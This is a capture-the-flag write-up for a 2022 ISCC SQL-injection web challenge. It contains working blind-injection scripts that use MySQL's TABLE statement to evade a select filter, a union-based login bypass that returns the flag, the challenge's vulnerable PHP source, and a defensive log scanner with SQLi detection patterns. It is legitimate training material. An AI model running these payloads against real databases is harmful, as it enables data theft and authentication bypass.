
2022-ISCC-web-Easy-SQL-writeup

sanyeah 2024-04-04 11:08:27 gitee 4 views 0 comments

0x01 Challenge

0x02 Approach

Visit the challenge URL.

The challenge text and the response make the hint obvious: SQL injection. Request

http://59.110.159.206:7010/?id=1%20and%201=1

The page returns normally, so the id parameter is injectable.

Next, try

http://59.110.159.206:7010/?id=-1%20union%20select%201,2

Response:

select is filtered, and neither changing the case of select nor encoding it gets past the filter, so the rest of the injection has to avoid select entirely.

The following post was used as a reference:

https://blog.csdn.net/aloneBUThappy/article/details/122047088

Script to brute-force the database name

import requests

# Candidate characters for the next position of the schema name: [0-9A-Za-z_]
fuzz_ascii = list(range(48, 58)) + list(range(65, 91)) + list(range(95, 123))

for i in fuzz_ascii:
    # Tuple comparison against the second row of information_schema.schemata, read with
    # the MySQL 8.0.19+ TABLE statement, which the select filter does not catch.
    # The page echoes the id=1 username "Dumb" only when the condition is true.
    res = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security" + chr(i) + "','',4,5,6)<=(table information_schema.schemata limit 1,1)")
    if 'Dumb' in res.text:
        print("<=: {0}".format(chr(i)))   # guessed prefix sorts at or before the real name
    else:
        print(">: {0}".format(chr(i)))    # guessed prefix sorts after the real name

Table brute-force scripts

Locate the row position of the table entry

import requests

# Probe row positions 1..499 of information_schema.tables
fuzz_ascii = range(1, 500)
test = []

for i in fuzz_ascii:
    # Row i is bracketed between ('def','security','0',...) and ('def','security','z',...):
    # both comparisons hold only when the row belongs to the 'security' schema.
    res1 = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','z','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) >= (table information_schema.tables limit " + str(i) + ",1)--+")
    res2 = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','0','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) <=(table information_schema.tables limit " + str(i) + ",1)--+")
    if 'Dumb' in res1.text and 'Dumb' in res2.text:
        print("<=: {0}".format(i))
        test.append(i)   # remember every row position that matched
print(test)

Brute-force the table name

import requests

# Candidate characters for the next position of the table name: [0-9A-Za-z_]
fuzz_ascii = list(range(48, 58)) + list(range(65, 91)) + list(range(95, 123))

for i in fuzz_ascii:
    # Row 81 is the position found by the previous script; the known prefix 'users'
    # is extended one character at a time.
    res = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','users" + chr(i) + "','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) >= (table information_schema.tables limit 81,1)--+")
    if 'Dumb' in res.text:
        print("<=: {0}".format(chr(i)))
    else:
        print(">: {0}".format(chr(i)))

Column brute-force scripts

Locate the row position of the column entry

import requests

# Probe row positions 1..9999 of information_schema.columns
fuzz_ascii = range(1, 10000)
test = []

for i in fuzz_ascii:
    # Same bracketing as for tables, now on the column name (4th tuple element)
    res1 = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','flag','z','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) >= (table information_schema.columns limit " + str(i) + ",1)--+")
    res2 = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','flag','0','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) <=(table information_schema.columns limit " + str(i) + ",1)--+")
    if 'Dumb' in res1.text and 'Dumb' in res2.text:
        print("<=: {0}".format(i))
        test.append(i)   # remember every row position that matched
print(test)

Brute-force the column name

import requests

# Candidate characters for the next position of the column name: [0-9A-Za-z_]
fuzz_ascii = list(range(48, 58)) + list(range(65, 91)) + list(range(95, 123))

for i in fuzz_ascii:
    # Row 739 is the position found by the previous script; the column name of the
    # emails table is built up one character at a time.
    res = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','emails','" + chr(i) + "','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) >= (table information_schema.columns limit 739,1)--+")
    if 'Dumb' in res.text:
        print("<=: {0}".format(chr(i)))
    else:
        print(">: {0}".format(chr(i)))

As the challenge asks, query the contents of the emails table:

http://59.110.159.206:7010/?id=-1%20union%20table%20security.emails%20limit%207,1

Response:

This gives beaxia's email address. Submitting it as the flag is wrong, so dig further and request a path named after the email address:

http://59.110.159.206:7010/ypHeMPardErE.zip

This downloads an archive; extracting it yields a single index.php file.

Opening it, this appears to be the source of the injection page from earlier:

<?php
include "./config.php";
// error_reporting(0);
// highlight_file(__FILE__);
$conn = mysqli_connect($hostname, $username, $password, $database);
if ($conn->connect_errno) {
    die("Connection failed: " . $conn->connect_errno);
}

echo "Where is the database?"."<br>";

echo "try ?id";

function sqlWaf($s)
{
    $filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';
    if (preg_match($filter,$s))
        return False;
    return True;
}

if (isset($_GET['id'])) 
{
    $id = $_GET['id'];
    $sql = "select * from users where id=$id";
    $safe = preg_match('/select/is', $id);
    if($safe!==0)
        die("No select!");
    $result = mysqli_query($conn, $sql);
    if ($result) 
    {
        $row = mysqli_fetch_array($result);
        echo "<h3>" . $row['username'] . "</h3><br>";
        echo "<h3>" . $row['passwd'] . "</h3>";
    }
    else
        die('<br>Error!');
}


if (isset($_POST['username']) && isset($_POST['passwd'])) 
{

    $username = strval($_POST['username']);
    $passwd = strval($_POST['passwd']);

    if ( !sqlWaf($passwd) )
        die('damn hacker');

    $sql = "SELECT * FROM users WHERE username='${username}' AND passwd= '${passwd}'";
    $result = $conn->query($sql);
    if ($result->num_rows > 0) {
        $row = $result->fetch_assoc();
        if ( $row['username'] === 'admin' && $row['passwd'] )
        {
            if ($row['passwd'] == $passwd)
            {
                die($flag);
            } else {
                die("username or passwd wrong, are you admin?");
            }
        } else {
            die("wrong user");
        }
    } else {
        die("user not exist or wrong passwd");
    }
}
mysqli_close($conn); 
?>

From the code, select is filtered in the id parameter. The code also accepts username and passwd via POST; passwd goes through sqlWaf, but username is not filtered at all.

So the injection goes through username: the row that comes back must have username admin, and afterwards $row['passwd'] == $passwd must hold.

Construct the POST parameters:

username=admin' union select 9, 'admin', 'I-kill-you'-- &passwd=I-kill-you

This returns the flag.
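As an added defensive example, not part of the original writeup or the challenge's code, the following Python script scans web-server access-log lines for the request shapes this challenge relies on: a non-numeric id, the union and select keywords that the page's own preg_match('/select/is') check looks for, and the MySQL TABLE statement, tuple comparison and information_schema references that a bare select filter lets through. The log lines, client IPs and timestamps are constructed, and the indicator regexes are this example's own assumptions about what is worth flagging.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original writeup). The id values
# mirror the request shapes the writeup shows, plus two benign numeric requests.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Apr/2024:11:08:27 +0000] "GET /?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [04/Apr/2024:11:08:28 +0000] "GET /?id=1%20and%201=1 HTTP/1.1" 200 512
203.0.113.5 - - [04/Apr/2024:11:08:29 +0000] "GET /?id=-1%20union%20select%201,2 HTTP/1.1" 200 40
203.0.113.5 - - [04/Apr/2024:11:08:30 +0000] "GET /?id=1%20and%20('def','securitya','',4,5,6)<=(table%20information_schema.schemata%20limit%201,1) HTTP/1.1" 200 512
203.0.113.5 - - [04/Apr/2024:11:08:31 +0000] "GET /?id=-1%20union%20TABLE%20security.emails%20limit%207,1 HTTP/1.1" 200 512
198.51.100.7 - - [04/Apr/2024:11:09:00 +0000] "GET /?id=42 HTTP/1.1" 200 512
"""

# Combined log format: client ip, request method and path, status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Indicators are applied to the *decoded* id value. The first is what the challenge's
# own filter catches; the rest cover what it misses, in particular the TABLE statement.
INDICATORS = {
    "select_keyword": re.compile(r"\bselect\b", re.I),
    "union_keyword": re.compile(r"\bunion\b", re.I),
    "table_statement": re.compile(r"\btable\s+[\w`]+(\.[\w`]+)?", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    # a row constructor of string/number literals followed by a comparison operator
    "tuple_compare": re.compile(r"\(\s*'[^']*'\s*(,\s*('[^']*'|\d+)\s*)+\)\s*(<=|>=|<>|=|<|>)"),
    "boolean_logic": re.compile(r"\b(and|or)\b", re.I),
}


def parse_log_line(line):
    """Return (client_ip, request_path) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group(1), m.group(3)


def extract_id(path):
    """Return the percent-decoded ?id= value from a request path, or None if absent."""
    values = parse_qs(urlsplit(path).query, keep_blank_values=True).get("id")
    return values[0] if values else None


def classify_id(value):
    """Return the sorted indicator names matching the id value; [] for a plain integer."""
    if re.fullmatch(r"-?\d+", value.strip()):
        return []
    hits = ["non_numeric_id"]
    hits += [name for name, rx in INDICATORS.items() if rx.search(value)]
    return sorted(hits)


def scan_log(text):
    """Return [(client_ip, decoded_id, indicators)] for every request whose id is suspicious."""
    flagged = []
    for line in text.splitlines():
        parsed = parse_log_line(line)
        if not parsed:
            continue
        ip, path = parsed
        value = extract_id(path)
        if value is None:
            continue
        indicators = classify_id(value)
        if indicators:
            flagged.append((ip, value, indicators))
    return flagged


if __name__ == "__main__":
    for ip, value, indicators in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{','.join(indicators)}\t{value}")
```

The point of the separate indicators is visible in the last flagged line: a union query that reads the emails table through TABLE never triggers select_keyword, so a detection rule (or a WAF) that only looks for select, as this challenge's code does, would miss it; the real fix on the application side is a parameterised query for id rather than a longer keyword list.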
